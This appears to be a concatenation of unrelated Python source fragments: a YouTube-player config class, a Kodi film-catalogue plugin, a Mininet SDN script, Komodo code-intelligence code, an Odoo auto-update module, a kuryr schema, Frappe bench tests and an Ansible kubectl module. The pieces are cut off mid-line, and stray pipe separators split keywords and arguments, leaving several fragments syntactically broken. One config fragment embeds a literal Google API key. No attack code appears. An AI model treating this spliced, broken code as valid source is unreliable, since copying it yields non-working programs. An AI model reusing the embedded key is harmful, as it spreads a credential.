ConfigItem("window_size", "",
check_fn=check_win_size, require_known_player=True),
ConfigItem("download_command", ''),
ConfigItem("lastfm_username", ''),
ConfigItem("lastfm_password", '', check_fn= | check_lastfm_password),
ConfigItem("lastfm_api_key", ''),
ConfigItem("lastfm_api_secret", ''),
ConfigItem("audio_format", "auto",
allowed_values="auto webm m4a".split()),
ConfigItem("video_format", "auto",
allowed_values="auto webm mp4 3gp".split()),
ConfigItem("api_key", "AIzaSyCIM4EzNqi1in22f4Z3Ru3iYvLaY8tc3bo",
check_fn=check_api_key),
ConfigItem("autoplay", False),
ConfigItem("set_title", True),
ConfigItem("mpris", not mswin),
]
def __getitem__(self, key):
# TODO: Possibly more efficient algorithm, w/ caching
for i in self._configitems:
if i.name.upper() == key:
return i
raise KeyError
def __getattr__(self, name):
try:
return self[name]
except KeyError:
raise AttributeError
def __iter__(self):
return (i.name.upper() for i in self._configitems)
def save(self):
""" Save current config to file. """
config = {setting: self[setting].value for setting in self}
with open(g.CFFILE, "wb") as cf:
pickle.dump(config, cf, protocol=2)
util.dbg(c.p + "Saved config: " + g.CFFILE + c.w)
def load(self):
""" Override config if config file exists. """
if os.path.exists(g.CFFILE):
with open(g.CFFILE, "rb") as cf:
saved_config = pickle.load(cf)
for k, v in saved_config.items():
try:
self[k].value = v
except KeyError: # Ignore unrecognised data in config
util.dbg("Unrecognised config item: %s", k)
# Update config files from versions <= 0.01.41
if isinstance(self.PLAYERARGS.get, list):
self.WINDOW_POS.value = "top-right"
redundant = ("-really-quiet --really-quiet -prefer-ipv4 -nolirc "
"-fs --fs".split())
for r in redundant:
util.dbg("removing redundant arg %s", r)
util.list_update(r, self.PLAYERARGS.value, remove=True)
self.PLAYERARGS.value = " ".join(self.PLAYERARGS.get)
self.save()
Config = _Config()
del _Config # _Config is a singleton and should not have more in |
'Country': country,
'PlotOutline': item['description'],
'Plot': item['long_description'],
'Year': item['year'],
'Rating': imdb['rating'],
'Votes': imdb['votes']
}
country = ' (' + country + ')' if (country) else ''
label = common.replaceHTMLCodes('[B]' + item['name'] + '[/B]' + country + genres + rating)
icon = BASE_URL + item['cover']
video_id = item['movie_id']
items.append({
'label': label,
'icon': icon,
'properties': properties,
'id': video_id
})
else:
megogo = True
except:
pass
# if megogo: plugin.notify('Megogo пропущен', BASE_NAME, 1000, get_local_icon('noty_' + BASE_LABEL))
except:
default_oc_noty()
return {'items': items, 'sys_items': sys_items}
# method
def get_genre_movie_list(genre, page='0'):
sys_items = []
items = []
size = 40
order_id = 0
try:
offset = int(page) * size
result = common.fetchPage({'link': BASE_API_URL,
'post_data': {'action[0]': 'Video.getCatalog', 'offset[0]': str(offset),
'size[0]': str(size), 'order[0]': order_id, 'genre[0]': genre}})
kg_stats(BASE_URL, GA_CODE, NK_CODE)
if result['status'] == 200:
data = json.loads(result['content'])
data = data['json'][0]['response']
# ======== pagination ========#
sys_items = KG_get_pagination((offset / size + 1), total=data['total'], size=size, offset=1)
# ======== END pagination ========#
megogo = False
for item in data['movies']:
try:
try:
genres = ' [' + ', '.join(item['genres'][:3]) + ']'
except:
genres = ''
if 'Megogo' not in item['genres']:
imdb = {'rating': '0', 'votes': '0'}
kinopoisk = {'rating': '0', 'votes': '0'}
if ('rating_imdb_value' in item):
imdb = {'rating': item['rating_imdb_value'], 'votes': item['rating_imdb_count']}
if ('rating_kinopoisk_value' in item):
kinopoisk = {'rating': item['rating_kinopoisk_value'],
'votes': item['rating_kinopoisk_count']}
rating = ''
if (imdb['rating'] != '0' and kinopoisk['rating'] != '0'):
rating = ' ' + imdb['rating'] + ' (' + imdb['votes'] + ') / ' + kinopoisk[
'rating'] + ' (' + kinopoisk['votes'] + ')'
country = ''
if ('countries' in item):
country = item['countries'][0]
properties = {
'Country': country,
'PlotOutline': item['description'],
'Plot': item['long_description'],
'Year': item['year'],
'Rating': imdb['rating'],
'Votes': imdb['votes']
}
country = ' (' + country + ')' if (country) else ''
label = common.replaceHTMLCodes('[B]' + item['name'] + '[/B]' + country + genres + rating)
icon = BASE_URL + item['cover']
video_id = item['movie_id']
items.append({
'label': label,
'icon': icon,
'properties': properties,
'id': video_id
})
else:
megogo = True
except:
pass
# if megogo: plugin.notify('Megogo пропущен', BASE_NAME, 1000, get_local_icon('noty_' + BASE_LABEL))
except:
default_oc_noty()
return {'items': items, 'sys_items': sys_items}
# method
def get_search_results(search_value=''):
items = []
try:
result = common.fetchPage({'link': BASE_URL + 'suggestion.php?q=' + urllib2.quote(search_value)})
kg_stats(BASE_URL, GA_CODE, NK_CODE)
if result['status'] == 200:
data = json.loads(result['content'])
data = data['json'][0]['response']
for item in data['movies']:
t | ry:
label = item['name'] + ' | ' + item['international_name'] + ' (' + item['year'] + ')'
icon = BASE_URL + item['cover']
video_id = item['movie_id']
items.append({
'label': | common.replaceHTMLCodes(label),
'icon': icon,
'id': video_id
})
except:
pass
except:
default_oc_noty()
return items
# method
def get_movie(id):
items = []
try:
result = common.fetchPage(
{'link': BASE_API_URL, 'post_data': {'action[0]': 'Video.getMovie', 'movie_id[0]': id}})
kg_stats(BASE_URL, GA_CODE, NK_CODE)
if result['status'] == 200:
data = json.loads(result['content'])
item = data['json'][0]['response']['movie']
icon = BASE_URL + item['covers'][0]['original']
try:
trailer = item['trailer']
try:
name = trailer['name']
except:
name = 'Трейлер'
items.append({
'title': name,
'label': name,
'icon': get_local_icon('kinopoisk'),
'properties': {'fanart_image': trailer['preview']},
'url': trailer['video']
})
except:
pass
for video in item['files']:
try:
label = item['name'] + ': ' + video['name']
url = get_playable_url(video['path']) + UserAgent
try:
fan = video['frames'][0]
except:
fan = ''
properties = {
'duration': video['metainfo']['playtime'],
'fanart_image': fan,
}
items.append({
'title': label,
'label': set_color('ПРОСМОТР: ', 'bold').decode('utf-8') + label,
'icon': icon,
'properties': properties,
'url': url
})
except:
# xbmc.log('Exception : ' + str(traceback.format_exc()))
continue
try:
for other in item['other_movies']:
try:
try:
fan = BASE_URL + other['cover']
except:
fan = ''
properties = {
'fanart_image': fan,
}
items.append({
'title': other['name'],
'label': set_color('ЕЩЕ: ', 'bold').decode('utf-8') + other['name'],
'icon': fan,
'properties': properties,
'url': plugin.url_for('oc_movie', id=othe |
#!/usr/bin/python
NWID=1
NR_NODES=20
#Controllers=[{"ip":'127.0.0.1', "port":6633}, {"ip":'10.0.1.28', "port":6633}]
Controllers=[{"ip":'10.0.1.28', "port":6633}]
"""
Start up a Simple topology
"""
from mininet.net import Mininet
from mininet.node import Controller, RemoteController
from mininet.log import setLogLevel, info, error, warn, debug
from mininet.cli import CLI
from mininet.topo import Topo
from mininet.util import quietRun
from mininet.moduledeps import pathCheck
from mininet.link import Link, TCLink
from sys import exit
import os.path
from subprocess import Popen, STDOUT, PIPE
import sys
#import argparse
class MyController( Controller ):
def __init__( self, name, ip='127.0.0.1', port=6633, **kwargs):
"""Init.
name: name to give controller
ip: the IP address where the remote controller is
listening
port: the port where the remote controller is listening"""
Controller.__init__( self, name, ip=ip, port=port, **kwargs )
def start( self ):
"Overridden to do nothing."
return
de | f stop( self ):
"Overridden to do nothing."
| return
def checkListening( self ):
"Warn if remote controller is not accessible"
listening = self.cmd( "echo A | telnet -e A %s %d" %
( self.ip, self.port ) )
if 'Unable' in listening:
warn( "Unable to contact the remote controller"
" at %s:%d\n" % ( self.ip, self.port ) )
class SDNTopo( Topo ):
"SDN Topology"
def __init__( self, *args, **kwargs ):
Topo.__init__( self, *args, **kwargs )
switch = []
host = []
root = []
for i in range (NR_NODES):
name_suffix = '%02d' % NWID + "." + '%02d' % i
dpid_suffix = '%02x' % NWID + '%02x' % i
dpid = '0000' + '0000' + '0000' + dpid_suffix
sw = self.addSwitch('sw'+name_suffix, dpid=dpid)
switch.append(sw)
for i in range (NR_NODES):
host.append(self.addHost( 'host%d' % i ))
for i in range (NR_NODES):
root.append(self.addHost( 'root%d' % i, inNamespace=False ))
for i in range (NR_NODES):
self.addLink(host[i], switch[i])
for i in range (1, NR_NODES):
self.addLink(switch[0], switch[i])
for i in range (NR_NODES):
self.addLink(root[i], host[i])
def startsshd( host ):
"Start sshd on host"
info( '*** Starting sshd\n' )
name, intf, ip = host.name, host.defaultIntf(), host.IP()
banner = '/tmp/%s.banner' % name
host.cmd( 'echo "Welcome to %s at %s" > %s' % ( name, ip, banner ) )
host.cmd( '/usr/sbin/sshd -o "Banner %s"' % banner, '-o "UseDNS no"' )
info( '***', host.name, 'is running sshd on', intf, 'at', ip, '\n' )
def startsshds ( hosts ):
for h in hosts:
startsshd( h )
def stopsshd( ):
"Stop *all* sshd processes with a custom banner"
info( '*** Shutting down stale sshd/Banner processes ',
quietRun( "pkill -9 -f Banner" ), '\n' )
def sdnnet(opt):
topo = SDNTopo()
info( '*** Creating network\n' )
#net = Mininet( topo=topo, controller=MyController, link=TCLink)
net = Mininet( topo=topo, link=TCLink, build=False)
controllers=[]
for c in Controllers:
rc = RemoteController('c%d' % Controllers.index(c), ip=c['ip'],port=c['port'])
print "controller ip %s port %s" % (c['ip'], c['port'])
controllers.append(rc)
net.controllers=controllers
net.build()
host = []
for i in range (NR_NODES):
host.append(net.get( 'host%d' % i ))
net.start()
sw=net.get('sw01.00')
print "center sw", sw
sw.attach('tapa0')
for i in range (NR_NODES):
host[i].defaultIntf().setIP('192.168.%d.%d/16' % (NWID,i))
root = []
for i in range (NR_NODES):
root.append(net.get( 'root%d' % i ))
for i in range (NR_NODES):
host[i].intf('host%d-eth1' % i).setIP('1.1.%d.1/24' % i)
root[i].intf('root%d-eth0' % i).setIP('1.1.%d.2/24' % i)
stopsshd ()
startsshds ( host )
if opt=="cli":
CLI(net)
stopsshd()
net.stop()
if __name__ == '__main__':
setLogLevel( 'info' )
if len(sys.argv) == 1:
sdnnet("cli")
elif len(sys.argv) == 2 and sys.argv[1] == "-n":
sdnnet("nocli")
else:
print "%s [-n]" % sys.argv[0]
|
s None:
style = self.accessor.style_at_pos(pos)
style_names = self.style_names_from_style_num(style)
raise CodeIntelError("got unexpected style in `%s': %s %s"
% (basename(self.path), style, style_names))
try:
langintel = self.mgr.langintel_from_lang(lang)
except KeyError:
return None
return langintel.trg_from_pos(self, pos, implicit=implicit, trigger_type=trigger_type)
def preceding_trg_from_pos(self, pos, curr_pos, trigger_type="both"):
if curr_pos == 0:
return None
lang = self.lang_from_pos(curr_pos-1)
try:
langintel = self.mgr.langintel_from_lang(lang)
except KeyError:
return None
return langintel.preceding_trg_from_pos(self, pos, curr_pos, trigger_type=trigger_type)
def curr_calltip_arg_range(self, trg_pos, calltip, curr_pos):
if curr_pos == 0:
return None
lang = self.lang_from_pos(curr_pos-1)
try:
langintel = self.mgr.langintel_from_lang(lang)
except KeyError:
return (-1, -1)
try:
return langintel.curr_calltip_arg_range(self, trg_pos, calltip,
curr_pos)
except AttributeError:
# This can happen if we accidentally move into a non-programming
# language during a calltip. E.g. bug 69529. Cancel the calltip
# in this case.
return (-1, -1)
def async_eval_at_trg(self, trg, ctlr):
try:
langintel = self.mgr.langintel_from_lang(trg.lang)
except KeyError:
return None
return langintel.async_eval_at_trg(self, trg, ctlr)
# Override Citadel.defn_trg_from_pos()
def defn_trg_from_pos(self, pos, lang=None):
# Work out the language from the position, as the citadel buffer will
# use the buffer language, we want a language specific to this pos.
return CitadelBuffer.defn_trg_from_pos(self, pos,
lang=self.lang_from_pos(pos))
def libs(self):
"""A simple `.libs' property does not work for multi-lang buffers.
Use `.libs_from_lang(lang)' instead.
"""
raise RuntimeError("`.libs' invalid for multi-lang buffers: use "
"`mgr.langintel_from_lang(lang).libs_from_buf(buf)' "
"directly")
def style_names_from_style_num(self, style_num):
# XXX Would like to have python-foo instead of p_foo or SCE_P_FOO, but
# that requires a more comprehensive solution for all langs and
# multi-langs.
style_names = []
# Get the constant name from ScintillaConstants.
if "UDL" not in self._style_name_from_style_num_from_lang:
name_from_num \
= self._style_name_from_style_num_from_lang["UDL"] = {}
if self.sce_prefixes is None:
raise CodeIntelError("'sce_prefixes' not set on class %s: cannot "
"determine style constant names"
% self.__class__.__name__)
for attr in dir(ScintillaConstants):
for sce_prefix in self.sce_prefixes:
if attr.startswith(sce_prefix):
name_from_num[getattr(ScintillaConstants, attr)] = attr
else:
name_from_num \
= self._style_name_from_style_num_from_lang["UDL"]
const_name = name_from_num[style_num]
style_names.append(const_name)
# Get a style group from styles.py.
if "UDL" in styles.StateMap:
for style_group, const_names in list(styles.StateMap["UDL"].items()):
if const_name in const_names:
style_names.append(style_group)
break
else:
log.warn("lang '%s' not in styles.StateMap: won't have "
"common style groups in HTML output" % "UDL")
return style_names
__string_styles = None
def string_styles(self):
if self.__string_styles is None:
state_map = styles.StateMap["UDL"]
self.__string_styles = [
getattr(ScintillaConstants, style_name)
for style_class in ("strings", "stringeol")
for style_name in state_map.get(style_class, [])
]
return self.__string_styles
__comment_styles = None
def comment_styles(self):
if self.__comment_styles is None:
state_map = styles.StateMap["UDL"]
self.__comment_styles = [
getattr(ScintillaConstants, style_name)
for style_class in ("comments", "here documents",
"data sections")
for style_name in state_map.get(style_class, [])
]
return self.__comment_styles
__number_styles = None
def number_styles(self):
if self.__number_styles is None:
state_map = styles.StateMap["UDL"]
self.__number_styles = [
getattr(ScintillaConstants, style_name)
for style_class in ("numbers",)
for style_name in state_map.get(style_class, [])
]
return self.__number_styles
class XMLParsingBufferMixin(object):
"""A mixin for UDLBuffer-based buffers of XML-y/HTML-y languages to
support the following:
- An "xml_tree" attribute that is a XML parse tree of the document
(lazily done from koXMLTreeService)
- An "xml_parse()" method to force a re-parse of the document.
TODO: locking?
"""
_xml_tree_cache = None
_xml_default_dataset_info = None
@property
def xml_tree(self):
if self._xml_tree_cache is None:
self.xml_parse()
return self._xml_tree_cache
def xml_parse(self):
from koXMLTreeService import getService
path = self.path
if isUnsavedPath(self.path):
# The "<Unsaved>/..." special path can *crash* Python if trying to
# open it. Besides, the "<Unsaved>" business is an internal
# codeintel detail.
path = None
self._xml_tree_cache = getService().getTreeForURI(
path, self.accessor.text)
def xml_default_dataset_info(self, node=None):
if self._xml_default_dataset_info is None:
import koXMLDatasetInfo
datasetSvc = koXMLDatasetInfo.getService()
self._xml_default_dataset_info = (
datasetSvc.getDefaultPublicId(self.m_lang, self.env),
None,
datasetSvc.getDefaultNamespace(self.m_lang, self.env))
return self._xml_default_dataset_info
def xml_tree_handler(self, node=None):
import koXMLDatasetInfo
return koXMLDatasetInfo.get_tree_handler(self._xml_tree_cache, node, self.xml_default_dataset_info(node))
def xml_node_at_pos(self, po | s):
import koXMLTreeService
self.xml_parse()
tree = self._xml_tree_cache
if not tree:
return None
line, col = self.accessor.line_and_col_at_pos(pos)
node = tree.locateNode(line, col)
# XXX this needs to be worked out better
last_start = self.accessor.text.rfind('<', 0, pos)
last_end = self.accessor.text.find('>', last_start, pos)
if node is None and last_start >= 0:
node = | koXMLTreeService.elementFromText(
tree, self.accessor.text[last_start:last_end], node)
if node is None or node.start is None:
return node
# elementtree line numbers are 1 based, convert to zero based
node_pos = self.accessor.pos_from_line_and_col(
node.start[0]-1, node.start[1])
if last_end == -1 and last_start != node_pos:
# print "try parse ls %d le %d np %d pos %d %r" % (last_start, last_end, node_pos, pos, accessor.text[last_start:pos])
# we have a dirty tree, need to create a cu |
# -*- coding: utf-8 -*-
# Copyright 2017 LasLabs Inc.
# Copyright 2018 ACSONE SA/NV.
# License LGPL-3.0 or later (http://www.gnu.org/licenses/lgpl).
import json
import logging
import os
from openerp import api, exceptions, models, tools
from openerp.modules.module import get_module_path
from ..addon_hash import addon_hash
PARAM_INSTALLED_CHECKSUMS = \
'module_auto_update.installed_checksums'
PARAM_EXCLUDE_PATTERNS = \
'module_auto_update.exclude_patterns'
DEFAULT_EXCLUDE_PATTERNS = \
'*.pyc,*.pyo,i18n/*.pot,i18n_extra/*.pot,static/*'
_logger = logging.getLogger(__name__)
class FailedUpgradeError(exceptions.Warning):
| pass
class IncompleteUpgradeError(exceptions.Warning):
pass
def ensure_module_state(env, modules, state):
# read module states, bypassing any Odoo cache
if not modules:
return
env.cr.execute(
"SELECT name FROM ir_module_module "
"WHERE id IN %s AND state != %s",
(tuple(modules.ids), state),
)
names = [r[0] for r in env.cr.fetchal | l()]
if names:
raise FailedUpgradeError(
"The following modules should be in state '%s' "
"at this stage: %s. Bailing out for safety." %
(state, ','.join(names), ),
)
class Module(models.Model):
_inherit = 'ir.module.module'
@api.multi
def _get_checksum_dir(self):
self.ensure_one()
exclude_patterns = self.env["ir.config_parameter"].get_param(
PARAM_EXCLUDE_PATTERNS,
DEFAULT_EXCLUDE_PATTERNS,
)
exclude_patterns = [p.strip() for p in exclude_patterns.split(',')]
keep_langs = self.env['res.lang'].search([]).mapped('code')
module_path = get_module_path(self.name)
if module_path and os.path.isdir(module_path):
checksum_dir = addon_hash(
module_path,
exclude_patterns,
keep_langs,
)
else:
checksum_dir = False
return checksum_dir
@api.model
def _get_saved_checksums(self):
Icp = self.env['ir.config_parameter']
return json.loads(Icp.get_param(PARAM_INSTALLED_CHECKSUMS, '{}'))
@api.model
def _save_checksums(self, checksums):
Icp = self.env['ir.config_parameter']
Icp.set_param(PARAM_INSTALLED_CHECKSUMS, json.dumps(checksums))
@api.model
def _save_installed_checksums(self):
checksums = {}
installed_modules = self.search([('state', '=', 'installed')])
for module in installed_modules:
checksums[module.name] = module._get_checksum_dir()
self._save_checksums(checksums)
@api.model
def _get_modules_partially_installed(self):
return self.search([
('state', 'in', ('to install', 'to remove', 'to upgrade')),
])
@api.model
def _get_modules_with_changed_checksum(self):
saved_checksums = self._get_saved_checksums()
installed_modules = self.search([('state', '=', 'installed')])
return installed_modules.filtered(
lambda r: r._get_checksum_dir() != saved_checksums.get(r.name),
)
@api.model
def upgrade_changed_checksum(self, overwrite_existing_translations=False):
"""Run an upgrade of the database, upgrading only changed modules.
Installed modules for which the checksum has changed since the
last successful run of this method are marked "to upgrade",
then the normal Odoo scheduled upgrade process
is launched.
If there is no module with a changed checksum, and no module in state
other than installed, uninstalled, uninstallable, this method does
nothing, otherwise the normal Odoo upgrade process is launched.
After a successful upgrade, the checksums of installed modules are
saved.
In case of error during the upgrade, an exception is raised.
If any module remains to upgrade or to uninstall after the upgrade
process, an exception is raised as well.
Note: this method commits the current transaction at each important
step, it is therefore not intended to be run as part of a
larger transaction.
"""
_logger.info(
"Checksum upgrade starting (i18n-overwrite=%s)...",
overwrite_existing_translations
)
tools.config['overwrite_existing_translations'] = \
overwrite_existing_translations
_logger.info("Updating modules list...")
self.update_list()
changed_modules = self._get_modules_with_changed_checksum()
if not changed_modules and not self._get_modules_partially_installed():
_logger.info("No checksum change detected in installed modules "
"and all modules installed, nothing to do.")
return
_logger.info("Marking the following modules to upgrade, "
"for their checksums changed: %s...",
','.join(changed_modules.mapped('name')))
changed_modules.button_upgrade()
self.env.cr.commit() # pylint: disable=invalid-commit
# in rare situations, button_upgrade may fail without
# exception, this would lead to corruption because
# no upgrade would be performed and save_installed_checksums
# would update cheksums for modules that have not been upgraded
ensure_module_state(self.env, changed_modules, 'to upgrade')
_logger.info("Upgrading...")
self.env['base.module.upgrade'].upgrade_module()
self.env.cr.commit() # pylint: disable=invalid-commit
_logger.info("Upgrade successful, updating checksums...")
self._save_installed_checksums()
self.env.cr.commit() # pylint: disable=invalid-commit
partial_modules = self._get_modules_partially_installed()
if partial_modules:
raise IncompleteUpgradeError(
"Checksum upgrade successful "
"but incomplete for the following modules: %s" %
','.join(partial_modules.mapped('name'))
)
_logger.info("Checksum upgrade complete.")
|
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from kuryr.schemata import commons
ENDPOINT_DELETE_SCHEMA = {
u'links': [{
u'method': u'POST',
u'href': u'/NetworkDriver.DeleteEndpoint',
u'description': u'Delete an Endpoint',
u'rel': u'self',
u'title': u'Delete'
}],
u'title': u'Delete endpoint',
u'required': [u'NetworkID', u'EndpointID'],
u'definitions': {u'commons': {}},
u' | $schema': u'http://json-schema.org/draft-04/hyper-schema',
u'type': u'object',
u'properties': {
u'NetworkID': {
u'description': u'Network ID',
u'$ref': u'#/definitions/commons/definitions/id'
},
u'EndpointID': {
u'description': u'Endpoint ID',
u'$ref': u'#/definitions/commons/definitions/id'
}
}
}
ENDPOINT_DELETE_SCHEMA[u'definitions'][u'commons'] = commons.COMMONS | |
rappe.conf.admin_password,
"root_login": frappe.conf.root_login,
"root_password": frappe.conf.root_password,
"db_type": frappe.conf.db_type,
}
site_data = {"test_site": TEST_SITE, **global_config}
for key, value in global_config.items():
if value:
self.execute(f"bench set-config {key} {value} -g")
# test 1: bench restore from full backup
self.execute("bench --site {test_site} backup --ignore-backup-conf", site_data)
self.execute(
"bench --site {test_site} execute frappe.utils.backups.fetch_latest_backups",
site_data,
)
site_data.update({"database": json.loads(self.stdout)["database"]})
self.execute("bench --site {test_site} restore {database}", site_data)
# test 2: restore from partial backup
self.execute("bench --site {test_site} backup --exclude 'ToDo'", site_data)
site_data.update({"kw": "\"{'partial':True}\""})
self.execute(
"bench --site {test_site} execute"
" frappe.utils.backups.fetch_latest_backups --kwargs {kw}",
site_data,
)
site_data.update({"database": json.loads(self.stdout)["database"]})
self.execute("bench --site {test_site} restore {database}", site_data)
self.assertEqual(self.returncode, 1)
def test_partial_restore(self):
_now = now()
for num in range(10):
frappe.get_doc({
"doctype": "ToDo",
"date": add_to_date(_now, days=num),
"description": frappe.mock("paragraph")
}).insert()
frappe.db.commit()
todo_count = frappe.db.count("ToDo")
# check if todos exist, create a partial backup and see if the state is the same after restore
self.assertIsNot(todo_count, 0)
self.execute("bench --site {site} backup --only 'ToDo'")
db_path = fetch_latest_backups(partial=True)["database"]
self.assertTrue("partial" in db_path)
frappe.db.sql_ddl("DROP TABLE IF EXISTS `tabToDo`")
frappe.db.commit()
self.execute("bench --site {site} partial-restore {path}", {"pa | th": db_path})
self.assertEqual(self.returncode, 0)
self.assertEqual(frappe.db.count("ToDo"), todo_count)
def test_recorder(self):
frappe.recorder.stop()
self.execute("bench --site {site} start-recording")
frappe.local.cache = {}
self.a | ssertEqual(frappe.recorder.status(), True)
self.execute("bench --site {site} stop-recording")
frappe.local.cache = {}
self.assertEqual(frappe.recorder.status(), False)
def test_remove_from_installed_apps(self):
app = "test_remove_app"
add_to_installed_apps(app)
# check: confirm that add_to_installed_apps added the app in the default
self.execute("bench --site {site} list-apps")
self.assertIn(app, self.stdout)
# test 1: remove app from installed_apps global default
self.execute("bench --site {site} remove-from-installed-apps {app}", {"app": app})
self.assertEqual(self.returncode, 0)
self.execute("bench --site {site} list-apps")
self.assertNotIn(app, self.stdout)
def test_list_apps(self):
# test 1: sanity check for command
self.execute("bench --site all list-apps")
self.assertIsNotNone(self.returncode)
self.assertIsInstance(self.stdout or self.stderr, str)
# test 2: bare functionality for single site
self.execute("bench --site {site} list-apps")
self.assertEqual(self.returncode, 0)
list_apps = set(
_x.split()[0] for _x in self.stdout.split("\n")
)
doctype = frappe.get_single("Installed Applications").installed_applications
if doctype:
installed_apps = set(x.app_name for x in doctype)
else:
installed_apps = set(frappe.get_installed_apps())
self.assertSetEqual(list_apps, installed_apps)
# test 3: parse json format
self.execute("bench --site {site} list-apps --format json")
self.assertEqual(self.returncode, 0)
self.assertIsInstance(json.loads(self.stdout), dict)
self.execute("bench --site {site} list-apps -f json")
self.assertEqual(self.returncode, 0)
self.assertIsInstance(json.loads(self.stdout), dict)
def test_show_config(self):
# test 1: sanity check for command
self.execute("bench --site all show-config")
self.assertEqual(self.returncode, 0)
# test 2: test keys in table text
self.execute(
"bench --site {site} set-config test_key '{second_order}' --parse",
{"second_order": json.dumps({"test_key": "test_value"})},
)
self.execute("bench --site {site} show-config")
self.assertEqual(self.returncode, 0)
self.assertIn("test_key.test_key", self.stdout.split())
self.assertIn("test_value", self.stdout.split())
# test 3: parse json format
self.execute("bench --site all show-config --format json")
self.assertEqual(self.returncode, 0)
self.assertIsInstance(json.loads(self.stdout), dict)
self.execute("bench --site {site} show-config --format json")
self.assertIsInstance(json.loads(self.stdout), dict)
self.execute("bench --site {site} show-config -f json")
self.assertIsInstance(json.loads(self.stdout), dict)
def test_get_bench_relative_path(self):
bench_path = get_bench_path()
test1_path = os.path.join(bench_path, "test1.txt")
test2_path = os.path.join(bench_path, "sites", "test2.txt")
with open(test1_path, "w+") as test1:
test1.write("asdf")
with open(test2_path, "w+") as test2:
test2.write("asdf")
self.assertTrue("test1.txt" in get_bench_relative_path("test1.txt"))
self.assertTrue("sites/test2.txt" in get_bench_relative_path("test2.txt"))
with self.assertRaises(SystemExit):
get_bench_relative_path("test3.txt")
os.remove(test1_path)
os.remove(test2_path)
def test_frappe_site_env(self):
os.putenv('FRAPPE_SITE', frappe.local.site)
self.execute("bench execute frappe.ping")
self.assertEqual(self.returncode, 0)
self.assertIn("pong", self.stdout)
def test_version(self):
self.execute("bench version")
self.assertEqual(self.returncode, 0)
for output in ["legacy", "plain", "table", "json"]:
self.execute(f"bench version -f {output}")
self.assertEqual(self.returncode, 0)
self.execute("bench version -f invalid")
self.assertEqual(self.returncode, 2)
def test_set_password(self):
from frappe.utils.password import check_password
self.execute("bench --site {site} set-password Administrator test1")
self.assertEqual(self.returncode, 0)
self.assertEqual(check_password('Administrator', 'test1'), 'Administrator')
# to release the lock taken by check_password
frappe.db.commit()
self.execute("bench --site {site} set-admin-password test2")
self.assertEqual(self.returncode, 0)
self.assertEqual(check_password('Administrator', 'test2'), 'Administrator')
def test_make_app(self):
user_input = [
b"Test App", # title
b"This app's description contains 'single quotes' and \"double quotes\".", # description
b"Test Publisher", # publisher
b"example@example.org", # email
b"", # icon
b"", # color
b"MIT" # app_license
]
app_name = "testapp0"
apps_path = os.path.join(get_bench_path(), "apps")
test_app_path = os.path.join(apps_path, app_name)
self.execute(f"bench make-app {apps_path} {app_name}", {"cmd_input": b'\n'.join(user_input)})
self.assertEqual(self.returncode, 0)
self.assertTrue(
os.path.exists(test_app_path)
)
# cleanup
shutil.rmtree(test_app_path)
@skipIf(
not (
frappe.conf.root_password
and frappe.conf.admin_password
and frappe.conf.db_type == "mariadb"
),
"DB Root password and Admin password not set in config"
)
def test_bench_drop_site_should_archive_site(self):
# TODO: Make this test postgres compatible
site = TEST_SITE
self.execute(
f"bench new-site {site} --force --verbose "
f"--admin-password {frappe.conf.admin_password} "
f"--mariadb-root-password {frappe.conf.root_password} "
f"--db-type {frappe.conf.db_type or 'mariadb'} "
)
self.assertEqual(self.returncode, 0)
self.execute(f"bench drop-site {site} --force --root-password {frappe.conf.root_password}")
self.assertEqual(self.returncode, 0)
bench_path = get_bench_path()
site_directory = os.path.join(bench_path, f'sites/{site}')
self.assertFalse(os.path.exists(site_directory))
archive_directory = os.path.join(bench_path, f'archived/sites/{site}')
self.assertTrue(os.path.exists(archive_directory))
class TestBackups(BaseTestCommands):
backup_map = {
"includes": {
"includes": [
|
, and stop resources within a Kubernetes Cluster
version_added: "2.0"
options:
name:
required: false
default: null
description:
- The name associated with resource
filename:
required: false
default: null
description:
- The path and filename of the resource(s) definition file(s).
- To operate on several files this can accept a comma separated list of files or a list of files.
aliases: [ 'files', 'file', 'filenames' ]
kubectl:
required: false
default: null
description:
- The path to the kubectl bin
namespace:
required: false
default: null
description:
- The namespace associated with the resource(s)
resource:
required: false
default: null
description:
- The resource to perform an action on. pods (po), replicationControllers (rc), services (svc)
label:
required: false
default: null
description:
- The labels used to filter specific resources.
server:
required: false
default: null
description:
- The url for the API server that commands are executed against.
force:
required: false
default: false
description:
- A flag to indicate to force delete, replace, or stop.
all:
required: false
default: false
description:
- A flag to indicate delete all, stop all, or all namespaces when checking exists.
log_level:
required: false
default: 0
description:
- Indicates the level of verbosity of logging by kubectl.
state:
required: false
choices: ['present', 'absent', 'latest', 'reloaded', 'stopped']
default: present
description:
- present handles checking existence or creating if definition file provided,
absent handles deleting resource(s) based on other options,
latest handles creating or updating based on existence,
reloaded handles updating resource(s) definition using definition file,
stopped handles stopping resource(s) based on other options.
requirements:
- kubectl
author: "Kenny Jones (@kenjones-cisco)"
"""
EXAMPLES = """
- name: test nginx is present
kube: name=nginx resource=rc state=present
- name: test nginx is stopped
kube: name=nginx resource=rc state=stopped
- name: test nginx is absent
kube: name=nginx resource=rc state=absent
- name: test nginx is present
kube: filename=/tmp/nginx.yml
- name: test nginx and postgresql are present
kube: files=/tmp/nginx.yml,/tmp/postgresql.yml
- name: test nginx and postgresql are present
kube:
files:
- /tmp/nginx.yml
- /tmp/postgresql.yml
"""
class KubeManager(object):
def __init__(self, module):
self.module = module
self.kubectl = module.params.get('kubectl')
if self.kubectl is None:
self.kubectl = module.get_bin_path('kubectl', True)
self.base_cmd = [self.kubectl]
if module.params.get('server'):
self.base_cmd.append('--server=' + module.params.get('server'))
if module.params.get('log_level'):
self.base_cmd.append('--v=' + str(module.params.get('log_level')))
if module.params.get('namespace'):
self.base_cmd.append('--namespace=' + module.params.get('namespace'))
self.all = module.params.get('all')
self.force = module.params.get('force')
self.name = module.params.get('name')
self.filename = [f.strip() for f in module.params.get('filename') or []]
self.resource = module.params.get('resource')
self.label = module.params.get('label')
def _execute(self, cmd):
args = self.base_cmd + cmd
try:
rc, out, err = self.module.run_command(args)
if rc != 0:
self.module.fail_json(
msg='error running kubectl (%s) command (rc=%d), out=\'%s\', err=\'%s\'' % (' '.join(args), rc, out, err))
except Exception as exc:
self.module.fail_json(
